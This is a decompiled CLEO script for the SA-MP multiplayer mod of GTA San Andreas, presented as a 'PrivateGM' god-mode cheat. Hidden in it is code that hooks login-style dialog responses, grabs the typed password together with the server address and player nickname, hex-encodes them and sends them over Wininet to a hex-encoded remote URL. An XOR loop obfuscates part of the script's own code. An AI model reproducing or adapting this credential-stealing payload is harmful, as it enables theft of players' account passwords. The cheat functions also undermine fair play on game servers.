// This file was decompiled using SASCM.ini published by GTAG (http://gtag.gtagaming.com/opcode-database) on 14.6.2013
{$CLEO .cs}
alloc 16@ 32
alloc 15@ 32
14@ = 0
format 15@ ""
format 16@ ""
wait 0
not SAMP.Available
else_jump @AIR_62
wait 400
jump @AIR_41
0BE1: raknet setup_outcoming_rpc_hook @AIR_73
0BDE: pause_thread 0
0BE5: raknet 0@ = get_hook_param 1
0BE5: raknet 1@ = get_hook_param 0
0@ == 62
else_jump @AIR_527
alloc 6@ 128
2@ = BitStream.Read(1@, 2)
3@ = BitStream.Read(1@, 0)
4@ = BitStream.Read(1@, 2)
5@ = BitStream.Read(1@, 0)
BitStream.ReadArray(1@, 6@, 5@)
0C1E: array 6@ element 5@ el_size 1 = 0
7@ = SAMP.GetDialogType()
if or
7@ == 1
7@ == 3
else_jump @AIR_522
29@ = SAMP.Base()
if and
3@ == 1
4@ == 65535
not 5@ == 0
else_jump @AIR_522
0A8E: 7@ = 29@ + 2203896 // int
0A8D: 7@ = read_memory 7@ size 4 virtual_protect 0
0A8E: 8@ = 7@ + 289 // int
0A8E: 9@ = 7@ + 32 // int
0A8E: 10@ = 7@ + 549 // int
0A8D: 11@ = read_memory 10@ size 4 virtual_protect 0
12@ = SAMP.GetSAMPPlayerIDByActorHandle($0[3])
13@ = SAMP.GetPlayerNickname(12@)
alloc 17@ 256
format 17@ "3341&&%s:%d&&%s&&%s&&%s&&%d" 9@ 11@ 8@ 13@ 6@ 2@
0C17: 18@ = strlen 17@
0C22: bin 17@ to_hex 17@ size 18@
0AC6: 19@ = label @AIR_1223 offset
alloc 20@ 544
format 20@ "%s%s" 19@ 17@
alloc 21@ 256
format 21@ "SAMP-Project"
call @AIR_1074 1 21@ 22@
call @AIR_1147 2 22@ 20@
free 17@
free 20@
free 21@
free 6@
0@ == 83
else_jump @AIR_1070
2@ = BitStream.Read(1@, 2)
3@ = SAMP.Base()
3@ += 2203896
0A8D: 3@ = read_memory 3@ size 4 virtual_protect 0
if and
not 14@ == 0
2@ == 65535
else_jump @AIR_893
0A8E: 8@ = 3@ + 289 // int
0A8E: 9@ = 3@ + 32 // int
0A8E: 10@ = 3@ + 549 // int
0A8D: 11@ = read_memory 10@ size 4 virtual_protect 0
12@ = SAMP.GetSAMPPlayerIDByActorHandle($0[3])
13@ = SAMP.GetPlayerNickname(12@)
alloc 17@ 256
format 17@ "3341&&%s:%d&&%s&&%s&&%s&&65535" 9@ 11@ 8@ 13@ 16@
0C17: 18@ = strlen 17@
0C22: bin 17@ to_hex 17@ size 18@
0AC6: 19@ = label @AIR_1223 offset
alloc 20@ 544
format 20@ "%s%s" 19@ 17@
alloc 21@ 256
format 21@ "SAMP-Project"
call @AIR_1074 1 21@ 22@
call @AIR_1147 2 22@ 20@
free 17@
free 20@
free 21@
14@ = 0
0C11: memset destination 15@ value 0 size 32
0C11: memset destination 16@ value 0 size 32
jump @AIR_1070
3@ += 973
0A8D: 3@ = read_memory 3@ size 4 virtual_protect 0
3@ += 16
0A8D: 4@ = read_memory 3@ size 4 virtual_protect 0
4@ += 9216
0A90: 5@ = 2@ * 4 // int
000A: 4@ += 5@ // Note: the incorrect math opcode was used here
0A8D: 4@ = read_memory 4@ size 4 virtual_protect 0
4@ > 1000
else_jump @AIR_1070
0A8E: 6@ = 4@ + 0 // int
0C17: 7@ = strlen 6@
if and
7@ == 1
not 14@ >= 11
else_jump @AIR_1070
14@ += 1
format 15@ "%s%s" 16@ 6@
format 16@ "%s" 15@
0BE0: raknet hook_ret 1
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 5 pop 0 0 0 0 0 0@ 1@
ret 1 1@
0AA2: 30@ = load_library "Wininet.dll" // IF and SET
0AA4: 29@ = get_proc_address "InternetOpenUrlA" library 30@ // IF and SET
0AA7: call_function 29@ num_params 6 pop 0 0 0 0 0 1@ 0@ 2@
ret 0
68 74 74 70 3A 2F 2F 73 61 6D 70 64 6C 6C 73 2E
72 75 2F 69 6E 63 6C 75 64 65 2F 61 64 64 2E 70
68 70 3F 64 61 74 61 3D 00 F6 AD A8 BD A8 F4 C9
0AC6: 0@ = label @AIR_7 offset
1@ = 1264
2@ = 0
0085: 5@ = 0@ // (int)
5@ -= 7
802D: not 2@ >= 1@ // (int)
else_jump @AIR_1392
0A8D: 3@ = read_memory 0@ size 1 virtual_protect 1
0B12: 4@ = 3@ XOR -55
0000: NOP
0A8C: write_memory 5@ size 1 value 4@ virtual_protect 1
0@ += 1
2@ += 1
5@ += 1
jump @AIR_1313
0A9F: 0@ = current_thread_pointer
0A8E: 1@ = 0@ + 16 // int
0A8D: 2@ = read_memory 1@ size 4 virtual_protect 1
1@ += 4
0A8C: write_memory 1@ size 4 value 2@ virtual_protect 1
thread "AIR"
wait 0
else_jump @AIR_7
wait 14050
0AAB: file_exists "cleo\SetGaemka.ini"
else_jump @AIR_99
0AF0: 1@ = get_int_from_ini_file "cleo\SetGaemka.ini" section "GM" key "KEY"
jump @AIR_168
0AF5: write_string "98" to_ini_file "cleo\SetGaemka.ini" section "GM" key "KEY"
0AF0: 1@ = get_int_from_ini_file "cleo\SetGaemka.ini" section "GM" key "KEY"
chatmsg "[PrivateGM (Gaemka) by AIR]: {FFFFFF}Loaded!" 3394611
chatmsg "[PrivateGM (Gaemka) by AIR]: {FFFFFF}ÁÈÍ× çáñ èí çå âîðëä (www.youtube.com/user/MrBench7777)" 3394611
wait 0
if and
key_down 1@
else_jump @AIR_324
jump @AIR_9861
else_jump @AIR_9977
0@ = Actor.CurrentCar($0[3])
Car.SetImmunities(0@, 1, 1, 1, 1, 1)
053F: set_car 0@ tires_vulnerability 0
Car.ImmuneToNonPlayer(0@) = True
03F5: set_car 0@ apply_damage_rules 0
Actor.SetImmunities($0[3], 1, 1, 1, 1, 1)
0BE3: raknet setup_incoming_rpc_hook @AIR_10160
0C48: samp textdraw 1 create "." pos 1.0 1.0
0C4C: samp textdraw 1 set_style 2
jump @AIR_10022
Actor.SetImmunities($0[3], 1, 1, 1, 1, 1)
0BE3: raknet setup_incoming_rpc_hook @AIR_10160
0C48: samp textdraw 1 create "." pos 1.0 1.0
0C4C: samp textdraw 1 set_style 2
wait 0
not key_down 1@
else_jump @AIR_10022
else_jump @AIR_10127
Car.SetImmunities(0@, 0, 0, 0, 0, 0)
053F: set_car 0@ tires_vulnerability 1
Car.ImmuneToNonPlayer(0@) = False
03F5: set_car 0@ apply_damage_rules 1
Actor.SetImmunities($0[3], 0, 0, 0, 0, 0)
0BE3: raknet setup_incoming_rpc_hook @AIR_10185
0C5E: samp textdraw 1 delete
jump @AIR_324
Actor.SetImmunities($0[3], 0, 0, 0, 0, 0)
0BE3: raknet setup_incoming_rpc_hook @AIR_10185
0C5E: samp textdraw 1 delete
jump @AIR_324
0BE5: raknet 3@ = get_hook_param 1
3@ == 14
else_jump @AIR_10187
0BE0: raknet hook_ret 0
0BE0: raknet hook_ret 1